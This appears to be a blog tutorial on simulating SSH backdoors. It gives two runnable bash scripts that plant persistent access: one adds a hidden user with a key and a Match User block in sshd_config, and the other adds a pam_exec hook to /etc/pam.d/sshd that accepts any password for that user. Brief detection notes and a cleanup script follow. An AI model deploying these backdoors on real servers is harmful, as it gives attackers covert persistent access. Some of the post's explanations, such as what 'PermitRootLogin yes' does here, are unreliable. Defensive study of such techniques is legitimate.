Understanding and Simulating SSH Backdoors

SSH (Secure Shell) is one of the most widely used protocols for secure remote access, but it's also a potential target for malicious actors looking to gain unauthorized access. To better protect our systems, it's essential to understand how SSH backdoors might be introduced, how to detect them, and how to mitigate these vulnerabilities.

In this blog post, we'll explore two methods of simulating a backdoor in the SSH configuration or authentication process. This simulation is intended for educational purposes in a controlled environment, ensuring that all actions are logged, auditable, and reversible.

Why Simulate a Backdoor?

Simulating a backdoor helps you understand potential attack vectors that could be used against your servers. By knowing how an attacker might bypass your security controls, you can better identify signs of compromise and implement more effective defenses.

Script 1: SSH Configuration Modification Backdoor

Our first method involves modifying the SSH daemon configuration (sshd_config) to create a hidden user that bypasses normal authentication checks.

How It Works

  1. Create a New User: A new user, backdoor_user, is created with a home directory.
  2. Generate an SSH Key: A new SSH key is generated for this user.
  3. Configure SSH: The SSH daemon configuration is modified to allow root login for this specific user.
  4. Access: The backdoor allows access to the server even if the main credentials are changed.

The Script

Here's the script to implement this backdoor:

#!/bin/bash

# Variables
BACKDOOR_USER="backdoor_user"
BACKDOOR_KEY_PATH="$HOME/.ssh/backdoor_key"

# Create a new user for the backdoor
sudo useradd -m $BACKDOOR_USER

# Generate an SSH key for the backdoor
ssh-keygen -f $BACKDOOR_KEY_PATH -N ""

# Setup authorized_keys for the backdoor user
sudo mkdir -p /home/$BACKDOOR_USER/.ssh
sudo chmod 700 /home/$BACKDOOR_USER/.ssh
sudo cp $BACKDOOR_KEY_PATH.pub /home/$BACKDOOR_USER/.ssh/authorized_keys
sudo chmod 600 /home/$BACKDOOR_USER/.ssh/authorized_keys
sudo chown -R $BACKDOOR_USER:$BACKDOOR_USER /home/$BACKDOOR_USER/.ssh

# Backup the original SSH configuration
sudo cp /etc/ssh/sshd_config /etc/ssh/sshd_config.bak

# Modify SSH configuration to allow the backdoor user
sudo bash -c "echo 'Match User $BACKDOOR_USER' >> /etc/ssh/sshd_config"
sudo bash -c "echo '   PermitRootLogin yes' >> /etc/ssh/sshd_config"

# Restart SSH to apply changes
sudo systemctl restart sshd

echo "Backdoor created. Use the following command to access the server:"
echo "ssh -i $BACKDOOR_KEY_PATH $BACKDOOR_USER@<server-ip>"

Indicators of Compromise

  • Unfamiliar users in the system (backdoor_user).
  • Modifications to the SSH configuration file, especially under Match User.
  • Suspicious SSH keys added to authorized_keys.

Mitigation

Regularly audit your SSH configurations and user accounts. Implement automated tools to detect unauthorized changes.

Script 2: PAM Configuration Modification Backdoor

The second method involves modifying the Pluggable Authentication Modules (PAM) system. PAM provides a flexible way to handle authentication and can be configured to bypass authentication for a specific user.

How It Works

  1. Create a New User: Similar to the first method, a new user, backdoor_user, is created.
  2. Modify PAM Configuration: The PAM configuration for SSH is modified to allow this user to bypass authentication.
  3. Access: The backdoor allows access using any password for the backdoor user.

The Script

Here's the script to implement this PAM backdoor:

#!/bin/bash

# Variables
BACKDOOR_USER="backdoor_user"
PAM_BACKDOOR_SCRIPT="/etc/security/backdoor.sh"

# Create a new user for the backdoor
sudo useradd -m $BACKDOOR_USER

# Backup PAM configuration for SSH
sudo cp /etc/pam.d/sshd /etc/pam.d/sshd.bak

# Create a PAM backdoor script
sudo bash -c "cat > $PAM_BACKDOOR_SCRIPT" <<EOL
#!/bin/bash
if [ "\$PAM_USER" == "$BACKDOOR_USER" ]; then
    exit 0
else
    exit 1
fi
EOL

# Make the backdoor script executable
sudo chmod +x $PAM_BACKDOOR_SCRIPT

# Modify PAM configuration for SSH to use the backdoor script
sudo bash -c "echo 'auth [success=1 default=ignore] pam_exec.so quiet $PAM_BACKDOOR_SCRIPT' >> /etc/pam.d/sshd"

# Restart SSH to apply changes
sudo systemctl restart sshd

echo "Backdoor created. Access the server using the following credentials:"
echo "Username: $BACKDOOR_USER"
echo "Password: <any password>"

Indicators of Compromise

  • Custom PAM scripts in /etc/security/.
  • Changes to /etc/pam.d/sshd to include pam_exec.so.
  • Unusual user behavior, such as successful logins with incorrect passwords.

Mitigation

Regularly audit your PAM configurations and scripts. Implement monitoring to detect unauthorized changes to critical files.

Cleaning Up: Reverting the Changes

After the simulation, it's essential to restore the server to its original state. Here's a script to clean up both backdoors:

#!/bin/bash

# Remove the backdoor user
sudo deluser --remove-home backdoor_user

# Restore SSH configuration
if [ -f /etc/ssh/sshd_config.bak ]; then
    sudo mv /etc/ssh/sshd_config.bak /etc/ssh/sshd_config
    sudo systemctl restart sshd
    echo "SSH configuration restored."
fi

# Restore PAM configuration
if [ -f /etc/pam.d/sshd.bak ]; then
    sudo mv /etc/pam.d/sshd.bak /etc/pam.d/sshd
    sudo rm -f /etc/security/backdoor.sh
    sudo systemctl restart sshd
    echo "PAM configuration restored."
fi

echo "Cleanup complete. Backdoor removed."

Final Thoughts

Simulating SSH backdoors is a valuable exercise in understanding potential vulnerabilities in your server's security configuration. By following these scripts, you can safely and ethically explore how backdoors might be introduced and, more importantly, how to detect and prevent them.


Disclaimer: This blog post is intended for educational purposes only. The methods discussed should only be used in environments where you have explicit permission to perform such tests. Unauthorized access to systems is illegal and unethical. Always act responsibly and within the bounds of the law.